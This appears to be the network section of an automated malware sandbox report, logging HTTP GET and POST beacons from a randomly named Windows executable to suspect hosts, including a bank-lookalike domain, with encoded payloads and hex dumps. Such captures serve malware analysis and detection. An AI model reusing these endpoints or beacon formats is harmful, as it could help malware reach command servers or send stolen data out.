                              0192.168.2.54971245.33.23.183805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:17:18.511466026 CEST468OUTGET /xsf1/?KxdLgNi=/2dxOCr9e8Tu47VkPNo5dAI1prtgpWpDtJEt3c2Foz5fpzeoRIujBVjrDMsKHc70+0K9iVKA7vE9ZFCiM5OaHQ9FJ0pFhf/XXW3oapof9+b9s/jcWq68S+C05ai3yP+Fag==&lL2=1ZRtX HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              Host: www.clientebradesco.online
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Aug 30, 2024 09:17:19.018246889 CEST1236INHTTP/1.1 200 OK
                              server: openresty/1.13.6.1
                              date: Fri, 30 Aug 2024 07:17:18 GMT
                              content-type: text/html
                              transfer-encoding: chunked
                              connection: close
                              Data Raw: 34 38 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 6c 69 65 6e 74 65 [TRUNCATED]
                              Data Ascii: 489<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.clientebradesco.online/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.clientebradesco.online/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.clientebradesco.online/xsf1?gp=1&js=1&uuid=1725002238.0041500934&other_args=eyJ1cmkiOiAiL3hzZjEiLCAiYXJncyI6ICJLeGRMZ05pPS8yZHhPQ3I5ZThUdTQ3VmtQTm81ZEFJMXBydGdwV3BEdEpFdDNjMkZvejVmcHplb1JJdWpCVmpyRE1zS0hjNzArMEs5aVZLQTd2RTlaRkNpTTVPYUhROUZKMHBGaGYvWFhXM29hcG9mOStiOXMvamNXcTY4UytDMDVhaTN5UCtGYWc9PSZsTDI9MVpSdFgiLCAicmVmZXJlciI6ICIiLCAiYWNjZXB0IjogInRleHQvaHRtbCxhcHBs [TRUNCATED]
                              Aug 30, 2024 09:17:19.018268108 CEST93INData Raw: 61 57 31 68 5a 32 55 76 64 32 56 69 63 43 77 71 4c 79 6f 37 63 54 30 77 4c 6a 67 69 66 51 3d 3d 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68
                              Data Ascii: aW1hZ2Uvd2VicCwqLyo7cT0wLjgifQ=="; } </script> </body></html>0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.549714199.59.243.226805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:17:34.242311001 CEST715OUTPOST /12ts/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 208
                              Host: www.myim.cloud
                              Origin: http://www.myim.cloud
                              Referer: http://www.myim.cloud/12ts/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 62 51 39 67 56 68 57 45 54 6a 2f 44 65 48 31 73 63 6e 64 34 69 4d 45 48 7a 73 4e 64 52 65 38 6a 46 7a 55 46 42 2f 77 55 5a 57 38 52 6a 6f 30 38 38 55 68 34 36 30 4b 67 73 32 39 38 68 39 67 6f 7a 43 73 65 69 32 4f 6b 42 5a 5a 71 69 71 6f 49 48 71 65 69 77 77 6e 31 6f 44 46 51 35 51 70 70 4c 4b 67 42 66 64 42 32 64 78 51 68 7a 44 56 6f 36 31 6b 56 42 68 76 32 71 56 52 65 67 4e 6a 6b 66 36 4e 58 4f 2f 6c 56 37 69 6b 6d 62 4f 55 4d 52 74 39 2f 51 7a 47 66 30 4f 33 54 79 6f 4c 68 79 63 2f 46 48 59 62 55 67 36 32 32 30 72 51 74 4c 58 35 5a 78 6d 35 67 4e 74 30 3d
                              Data Ascii: KxdLgNi=SIczoioFeEyVbQ9gVhWETj/DeH1scnd4iMEHzsNdRe8jFzUFB/wUZW8Rjo088Uh460Kgs298h9gozCsei2OkBZZqiqoIHqeiwwn1oDFQ5QppLKgBfdB2dxQhzDVo61kVBhv2qVRegNjkf6NXO/lV7ikmbOUMRt9/QzGf0O3TyoLhyc/FHYbUg6220rQtLX5Zxm5gNt0=
                              Aug 30, 2024 09:17:34.710808039 CEST1236INHTTP/1.1 200 OK
                              date: Fri, 30 Aug 2024 07:17:34 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1106
                              x-request-id: 0299f4c0-ac54-4c6f-b561-76cbbf632bc4
                              cache-control: no-store, max-age=0
                              accept-ch: sec-ch-prefers-color-scheme
                              critical-ch: sec-ch-prefers-color-scheme
                              vary: sec-ch-prefers-color-scheme
                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                              set-cookie: parking_session=0299f4c0-ac54-4c6f-b561-76cbbf632bc4; expires=Fri, 30 Aug 2024 07:32:34 GMT; path=/
                              connection: close
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 74 4a 35 77 54 74 63 61 39 34 30 50 45 46 62 77 36 4f 45 57 36 54 4b 30 67 64 35 53 53 6d 31 64 6e 76 33 75 39 64 47 42 38 5a 34 61 5a 6f 66 79 7a 79 77 69 46 46 30 58 74 46 56 4f 31 58 66 54 65 39 42 44 78 6e 6f 66 56 6c 53 47 55 34 65 43 4d 63 45 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                              Aug 30, 2024 09:17:34.710829973 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDI5OWY0YzAtYWM1NC00YzZmLWI1NjEtNzZjYmJmNjMyYmM0IiwicGFnZV90aW1lIjoxNzI1MDAyMj


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.549715199.59.243.226805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:17:36.785790920 CEST735OUTPOST /12ts/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 228
                              Host: www.myim.cloud
                              Origin: http://www.myim.cloud
                              Referer: http://www.myim.cloud/12ts/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 4a 41 4e 67 58 43 4f 45 55 44 2f 45 43 58 31 73 56 48 64 38 69 4d 49 48 7a 74 35 4e 52 74 59 6a 45 57 6f 46 41 36 63 55 55 32 38 52 37 34 30 44 32 30 68 7a 36 30 48 66 73 30 35 38 68 2b 63 6f 7a 48 6f 65 69 6e 4f 6a 42 4a 5a 6b 70 4b 6f 4b 4a 4b 65 69 77 77 6e 31 6f 44 68 32 35 51 78 70 49 35 34 42 4e 73 42 31 63 78 51 69 30 44 56 6f 77 56 6b 52 42 68 76 49 71 51 4a 77 67 50 62 6b 66 37 39 58 4f 4f 6c 53 79 69 6b 6f 52 75 56 67 55 64 6c 36 56 79 61 66 78 74 4f 6d 69 4a 72 64 7a 71 53 76 64 36 54 38 7a 61 61 4f 6b 34 59 61 61 6e 59 77 72 46 70 51 54 36 6a 4b 48 59 62 6c 32 68 34 62 4b 6b 77 44 54 46 6e 36 43 2b 6b 74
                              Data Ascii: KxdLgNi=SIczoioFeEyVJANgXCOEUD/ECX1sVHd8iMIHzt5NRtYjEWoFA6cUU28R740D20hz60Hfs058h+cozHoeinOjBJZkpKoKJKeiwwn1oDh25QxpI54BNsB1cxQi0DVowVkRBhvIqQJwgPbkf79XOOlSyikoRuVgUdl6VyafxtOmiJrdzqSvd6T8zaaOk4YaanYwrFpQT6jKHYbl2h4bKkwDTFn6C+kt
                              Aug 30, 2024 09:17:37.239430904 CEST1236INHTTP/1.1 200 OK
                              date: Fri, 30 Aug 2024 07:17:36 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1106
                              x-request-id: 6cb16f4a-1fb8-4813-8366-238a5857841a
                              cache-control: no-store, max-age=0
                              accept-ch: sec-ch-prefers-color-scheme
                              critical-ch: sec-ch-prefers-color-scheme
                              vary: sec-ch-prefers-color-scheme
                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                              set-cookie: parking_session=6cb16f4a-1fb8-4813-8366-238a5857841a; expires=Fri, 30 Aug 2024 07:32:37 GMT; path=/
                              connection: close
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 74 4a 35 77 54 74 63 61 39 34 30 50 45 46 62 77 36 4f 45 57 36 54 4b 30 67 64 35 53 53 6d 31 64 6e 76 33 75 39 64 47 42 38 5a 34 61 5a 6f 66 79 7a 79 77 69 46 46 30 58 74 46 56 4f 31 58 66 54 65 39 42 44 78 6e 6f 66 56 6c 53 47 55 34 65 43 4d 63 45 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                              Aug 30, 2024 09:17:37.239486933 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNmNiMTZmNGEtMWZiOC00ODEzLTgzNjYtMjM4YTU4NTc4NDFhIiwicGFnZV90aW1lIjoxNzI1MDAyMj


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.549716199.59.243.226805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:17:39.332509995 CEST1752OUTPOST /12ts/ HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Encoding: gzip, deflate, br
                              Accept-Language: en-us
                              Connection: close
                              Content-Type: application/x-www-form-urlencoded
                              Cache-Control: max-age=0
                              Content-Length: 1244
                              Host: www.myim.cloud
                              Origin: http://www.myim.cloud
                              Referer: http://www.myim.cloud/12ts/
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Data Raw: 4b 78 64 4c 67 4e 69 3d 53 49 63 7a 6f 69 6f 46 65 45 79 56 4a 41 4e 67 58 43 4f 45 55 44 2f 45 43 58 31 73 56 48 64 38 69 4d 49 48 7a 74 35 4e 52 74 51 6a 46 6b 77 46 42 5a 45 55 56 32 38 52 6c 6f 30 43 32 30 68 55 36 30 75 57 73 30 30 4a 68 37 59 6f 79 6c 67 65 79 46 6d 6a 50 4a 5a 6b 6d 71 6f 4a 48 71 65 4e 77 30 37 78 6f 44 78 32 35 51 78 70 49 2f 55 42 50 39 42 31 52 52 51 68 7a 44 56 30 36 31 6c 45 42 68 58 59 71 51 46 4f 67 2b 37 6b 66 62 74 58 4d 63 64 53 39 69 6b 71 57 75 56 34 55 64 59 71 56 79 47 70 78 73 71 49 69 4f 66 64 7a 4e 2f 32 42 37 6a 72 75 4d 47 73 72 71 42 38 4b 6a 45 4b 73 45 46 78 51 72 54 73 4c 4b 54 50 37 31 41 4c 43 48 64 37 45 6a 4b 73 4d 35 64 54 58 2b 53 33 6f 2f 6f 30 79 35 79 7a 41 50 70 54 58 32 7a 38 76 36 71 72 74 77 75 78 43 41 58 50 6c 65 37 2f 4e 63 42 53 70 4b 41 31 4d 4f 78 61 66 34 77 59 6e 59 36 39 35 77 59 4a 52 32 76 6f 47 57 6d 30 2b 53 52 56 6e 7a 4d 77 59 75 74 58 77 70 59 6c 4b 44 61 69 4e 64 71 66 7a 6d 54 71 6b 2b 6c 31 6c 41 68 52 43 5a 78 67 57 79 [TRUNCATED]
                              Data Ascii: KxdLgNi=SIczoioFeEyVJANgXCOEUD/ECX1sVHd8iMIHzt5NRtQjFkwFBZEUV28Rlo0C20hU60uWs00Jh7YoylgeyFmjPJZkmqoJHqeNw07xoDx25QxpI/UBP9B1RRQhzDV061lEBhXYqQFOg+7kfbtXMcdS9ikqWuV4UdYqVyGpxsqIiOfdzN/2B7jruMGsrqB8KjEKsEFxQrTsLKTP71ALCHd7EjKsM5dTX+S3o/o0y5yzAPpTX2z8v6qrtwuxCAXPle7/NcBSpKA1MOxaf4wYnY695wYJR2voGWm0+SRVnzMwYutXwpYlKDaiNdqfzmTqk+l1lAhRCZxgWys04b8NXgrYjRa2WIVW9kf52I0RNryu85+mQH3lLWtNSOGAcvuB+z9ypyK4oQ6irBTNgavZAwW5gNJTikrcpyM9hwst5rdcuaqhNPCNXdv+GEM2v1/K8ewJbmwsPP/Fv7YSUzC8lEysMxfF8Ed5Zidq3j6vicDxjYEBSRbkMnIfL+fTjbYdzTE+wsnJvqeAlHReF7m/hU0mGDoC8m9/z4AUaiImzyhwBt4y3p5PsF9IhxnUwd2W4e8ARRu9euXV5UAdsxkVGdfdP66PLSSeK7PrelPKckBZv1SmQcyHRZZRr7m2WcVLf41sWQwua5f/aYwmHTwj6yGFBRMyeHW5vnZyqrNPnQ67s9oZqPdxAi3MewcPjGa9QlCbiM6ZHEbx9k5DbApmlaV2Qt7urcm9qE/Gjc8HJZX2CLCtPMjAVkUagOeqITbGwid1APr+QM4ojas339PzIqBiVIGaJ2DI4AumRw9u39cw2eERzwjpUJbFqBsu/BrkKLkso/+4rkU25IwSzo2gDTFghFm+grKGlRLetl1hn+2chZuIP+OGzl8NsDiXkCBgThN0rp3BGNJwO3zXOZk8TjcHoqWxcUXQcAvE0dsQVtxYlplDpHlubtDvqBkdaQbBeIYEJkiLjio5iVRK4GecIWL4+p/gy2FOXyK5i64jF/Ww9rqA [TRUNCATED]
                              Aug 30, 2024 09:17:39.801146984 CEST1236INHTTP/1.1 200 OK
                              date: Fri, 30 Aug 2024 07:17:38 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1106
                              x-request-id: 7d4116c8-990e-446d-8de6-cd241026a658
                              cache-control: no-store, max-age=0
                              accept-ch: sec-ch-prefers-color-scheme
                              critical-ch: sec-ch-prefers-color-scheme
                              vary: sec-ch-prefers-color-scheme
                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==
                              set-cookie: parking_session=7d4116c8-990e-446d-8de6-cd241026a658; expires=Fri, 30 Aug 2024 07:32:39 GMT; path=/
                              connection: close
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 69 74 4a 35 77 54 74 63 61 39 34 30 50 45 46 62 77 36 4f 45 57 36 54 4b 30 67 64 35 53 53 6d 31 64 6e 76 33 75 39 64 47 42 38 5a 34 61 5a 6f 66 79 7a 79 77 69 46 46 30 58 74 46 56 4f 31 58 66 54 65 39 42 44 78 6e 6f 66 56 6c 53 47 55 34 65 43 4d 63 45 6b 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_itJ5wTtca940PEFbw6OEW6TK0gd5SSm1dnv3u9dGB8Z4aZofyzywiFF0XtFVO1XfTe9BDxnofVlSGU4eCMcEkA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                              Aug 30, 2024 09:17:39.801165104 CEST559INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiN2Q0MTE2YzgtOTkwZS00NDZkLThkZTYtY2QyNDEwMjZhNjU4IiwicGFnZV90aW1lIjoxNzI1MDAyMj


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.549717199.59.243.226805780C:\Program Files (x86)\jAmEDbvgEeypbrcypCzvOYAuORnCkUQCjeLKwqGzrJRRBHDGJjLoijoxKXvpJXPVsPCgDBeRqivG\umoPQplhJOFey.exe
                              TimestampBytes transferredDirectionData
                              Aug 30, 2024 09:17:41.891774893 CEST456OUTGET /12ts/?KxdLgNi=fK0TrVkIcECrXBt/QBT8PCmrckdVeV1vsNkWvaJ0XbQUSkAwNJoncWp26b1Q7HgZ6hy5g1l23+w5zEE84XOKO78C1JBbT4+4k1+SvQMP+iwoSoAbGtJFITlm6yZl6HBNXw==&lL2=1ZRtX HTTP/1.1
                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                              Accept-Language: en-us
                              Connection: close
                              Host: www.myim.cloud
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                              Aug 30, 2024 09:17:42.375375032 CEST1236INHTTP/1.1 200 OK
                              date: Fri, 30 Aug 2024 07:17:42 GMT
                              content-type: text/html; charset=utf-8
                              content-length: 1474
                              x-request-id: 32077f67-263a-4523-b11c-08a51d053a25
                              cache-control: no-store, max-age=0
                              accept-ch: sec-ch-prefers-color-scheme
                              critical-ch: sec-ch-prefers-color-scheme
                              vary: sec-ch-prefers-color-scheme
                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_BmSSCfYyrXAQXCvKDaMn9G8o+iA59Aa/UfAUw7tGh2XKeJGRHBJ/9eiBti8TEraEqgFxVAcialyk+Y9lOoLqUA==
                              set-cookie: parking_session=32077f67-263a-4523-b11c-08a51d053a25; expires=Fri, 30 Aug 2024 07:32:42 GMT; path=/
                              connection: close
                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 42 6d 53 53 43 66 59 79 72 58 41 51 58 43 76 4b 44 61 4d 6e 39 47 38 6f 2b 69 41 35 39 41 61 2f 55 66 41 55 77 37 74 47 68 32 58 4b 65 4a 47 52 48 42 4a 2f 39 65 69 42 74 69 38 54 45 72 61 45 71 67 46 78 56 41 63 69 61 6c 79 6b 2b 59 39 6c 4f 6f 4c 71 55 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
